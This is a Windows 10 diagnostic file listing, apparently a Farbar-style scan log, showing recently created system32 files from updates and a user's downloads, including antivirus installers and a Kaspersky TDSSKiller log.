2016-10-13 09:25 - 2016-10-05 12:16 - 19418624 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-10-13 09:25 - 2016-10-05 12:16 - 00704512 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscui.dll
2016-10-13 09:25 - 2016-10-05 12:16 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-10-13 09:25 - 2016-10-05 12:15 - 01375232 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-10-13 09:25 - 2016-10-05 12:15 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2016-10-13 09:25 - 2016-10-05 12:14 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-10-13 09:25 - 2016-10-05 12:14 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2016-10-13 09:25 - 2016-10-05 12:14 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-10-13 09:25 - 2016-10-05 12:13 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-10-13 09:25 - 2016-10-05 12:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 06108672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 03776000 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 01938944 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 01135616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-10-13 09:25 - 2016-10-05 12:10 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-10-13 09:25 - 2016-10-05 12:09 - 07467520 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 01700864 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2016-10-13 09:25 - 2016-10-05 12:09 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 00608256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-10-13 09:25 - 2016-10-05 12:08 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll
2016-10-13 09:25 - 2016-10-05 12:08 - 01485312 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-10-13 09:25 - 2016-10-05 12:08 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-10-13 09:25 - 2016-10-05 12:08 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-10-13 09:25 - 2016-10-05 12:07 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-10-13 09:25 - 2016-10-05 12:07 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2016-10-13 09:25 - 2016-10-05 12:07 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-10-13 09:25 - 2016-10-05 12:07 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-10-13 09:25 - 2016-10-05 12:07 - 01123328 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-10-13 09:25 - 2016-10-05 12:06 - 02254336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-10-13 09:25 - 2016-10-05 12:05 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2016-10-13 09:25 - 2016-10-05 12:05 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2016-10-13 09:25 - 2016-09-23 06:59 - 00446124 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-10-13 09:25 - 2016-09-07 08:18 - 00290264 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-10-13 08:59 - 2016-10-13 09:13 - 00264046 _____ C:\TDSSKiller.3.1.0.11_13.10.2016_08.59.35_log.txt
2016-10-13 08:58 - 2016-10-13 08:59 - 04747704 _____ (AO Kaspersky Lab) C:\Users\admin\Downloads\tdsskiller.exe
2016-10-12 08:52 - 2016-10-12 08:52 - 00128035 _____ C:\Users\admin\Downloads\w_makb09.pdf
2016-10-12 08:51 - 2016-10-12 08:52 - 06964582 _____ C:\Users\admin\Downloads\w_ubun08.pdf
2016-10-11 13:52 - 2016-10-11 13:52 - 00000110 _____ C:\Users\admin\Downloads\live.m3u
2016-10-10 16:01 - 2016-10-10 16:01 - 00301075 _____ C:\Users\admin\Downloads\6124_FP_20161010142802_notificare-saptamanala-program-rascumparare--4----7-octombri.pdf
2016-10-10 14:45 - 2016-10-10 14:45 - 00001024 _____ C:\Users\Public\Desktop\AnyBurn.lnk
2016-10-10 14:45 - 2016-10-10 14:45 - 00000000 ____D C:\Users\admin\AppData\Roaming\anyburn
2016-10-10 14:45 - 2016-10-10 14:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AnyBurn
2016-10-10 14:45 - 2016-10-10 14:45 - 00000000 ____D C:\Program Files\AnyBurn
2016-10-10 14:44 - 2016-10-10 14:45 - 01386432 _____ (Power Software Ltd) C:\Users\admin\Downloads\anyburn_setup.exe
2016-10-10 14:40 - 2016-10-10 14:40 - 04764169 _____ C:\Users\admin\Downloads\ir053_portable.zip
2016-10-10 13:54 - 2016-10-10 13:54 - 03838492 _____ (LIGHTNING UK!) C:\Users\admin\Downloads\SetupImgBurn_2.5.8.0.exe
2016-10-10 12:47 - 2016-10-10 12:48 - 00202240 _____ C:\Users\admin\Downloads\VizualizareExtras(2).xls
2016-10-10 12:47 - 2016-10-10 12:47 - 00178688 _____ C:\Users\admin\Downloads\VizualizareExtras(1).xls
2016-10-10 12:47 - 2016-10-10 12:47 - 00178688 _____ C:\Users\admin\Downloads\VizualizareExtras(1)(1).xls
2016-10-10 09:47 - 2016-10-10 09:47 - 00121504 _____ (ESET) C:\WINDOWS\system32\Drivers\ekbdflt.sys
2016-10-07 15:12 - 2016-10-07 15:12 - 00037880 _____ C:\Users\admin\Downloads\vS_PivotsD.mq4
2016-10-07 14:41 - 2016-10-07 14:41 - 00000000 ____D C:\Users\admin\Downloads\1466_en-PIVOT POINT SUPPORT RESISTANCE
2016-10-07 13:14 - 2016-10-07 13:14 - 03213568 _____ (AVG Technologies CZ, s.r.o.) C:\Users\admin\Downloads\AVG_Protection_Free_1647.exe
2016-10-07 12:41 - 2016-10-07 12:42 - 231192896 _____ (AVAST Software) C:\Users\admin\Downloads\avast_free_antivirus_setup_offline.exe
2016-10-07 11:59 - 2016-10-07 11:59 - 00000000 ____D C:\Users\admin\Downloads\orar 2016-2017
2016-10-07 10:45 - 2016-10-07 10:45 - 00184105 _____ C:\Users\admin\Downloads\6124_FP_20161006112407_raport-curent-struct-actionariat-30-septembrie-2016_6-oct-20.pdf
2016-10-07 09:47 - 2016-10-07 09:47 - 00000000 ____D C:\Users\admin\Downloads\PicoInstaller10.2.0
2016-10-07 09:44 - 2016-10-07 09:45 - 03300037 _____ C:\Users\admin\Downloads\PicoInstaller10.2.0.rar
2016-10-06 12:49 - 2016-10-06 12:49 - 00258203 _____ C:\Users\admin\Downloads\download.pdf
2016-10-06 12:47 - 2016-10-06 12:47 - 00196462 _____ C:\Users\admin\Downloads\6124_FP_20161005214944_Publicare-prospect_clean.pdf
2016-10-06 10:16 - 2016-10-06 10:16 - 05524272 _____ (Microsoft Corporation) C:\Users\admin\Downloads\setuplanguagepack.x64.ro-ro_(office2016).exe
2016-10-06 09:14 - 2016-10-06 09:42 - 3950503936 _____ C:\Users\admin\Downloads\Win10_Romanian_x64.iso
2016-10-04 10:34 - 2016-10-04 10:37 - 00035840 _____ C:\Users\admin\Downloads\CHELTUIELI VENITURI SEPT MAMA.xls
2016-10-04 10:32 - 2016-10-04 10:32 - 00036352 _____ C:\Users\admin\Downloads\CHELTUIELI VENITURI AUGUST MAMA (1).xls
2016-10-04 01:28 - 2016-10-03 15:26 - 00000000 ___DC C:\WINDOWS\Panther
2016-10-04 01:22 - 2016-10-07 09:47 - 00000000 ____D C:\Windows.old
2016-10-04 01:17 - 2016-10-04 01:17 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmploc.DLL
2016-10-04 01:17 - 2016-10-04 01:17 - 06534656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanmm.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 03595264 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2016-10-04 01:17 - 2016-10-04 01:17 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-10-04 01:17 - 2016-10-04 01:17 - 01997824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01966288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01957216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 01853232 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01842688 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01583112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01362504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01343928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00955528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00868704 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-10-04 01:17 - 2016-10-04 01:17 - 00856872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00834560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00798504 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00786432 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00762368 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00758784 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwcreator.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\system32\qdvd.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00557920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkCollectionAgent.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00433832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00431104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00402352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdechangepin.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00313560 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00302592 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00300544 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00292184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2016-10-04 01:17 - 2016-10-04 01:17 - 00279416 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeunlock.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00270848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAC3ENC.DLL
2016-10-04 01:17 - 2016-10-04 01:17 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00188416 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvenotify.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveprompt.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00133296 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00121368 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00121344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\baaupdate.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00106336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00103424 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00102752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00092000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00083120 _____ (Microsoft Corporation) C:\WINDOWS\system32\devenum.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00080224 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dasHost.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00043944 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceassociation.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeui.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\cngkeyhelper.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwmp.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdxm.ocx
2016-10-04 01:17 - 2016-10-04 01:17 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxmasf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 20965248 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 07625728 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 06654616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 05376000 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 04970224 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 04557824 _____ (Microsoft) C:\WINDOWS\system32\dbgeng.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 03716096 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02749440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02642944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02360832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02318336 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02107392 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02048496 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01897824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 01885696 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01774080 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01755136 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01557296 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01438720 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01413664 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
